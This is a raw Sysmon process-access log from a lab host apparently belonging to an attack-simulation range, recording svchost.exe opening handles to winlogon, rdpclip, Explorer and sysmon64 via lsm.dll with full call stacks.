12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}728996C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292275Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2dce|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292274Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292273Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292272Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292271Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292270Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+57a4|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292269Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292268Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292267Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292266Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292265Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292264Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292263Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292262Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292261Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}728996C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292260Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292259Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292258Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292257Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}728996C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292256Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292255Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292254Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292253Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292252Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 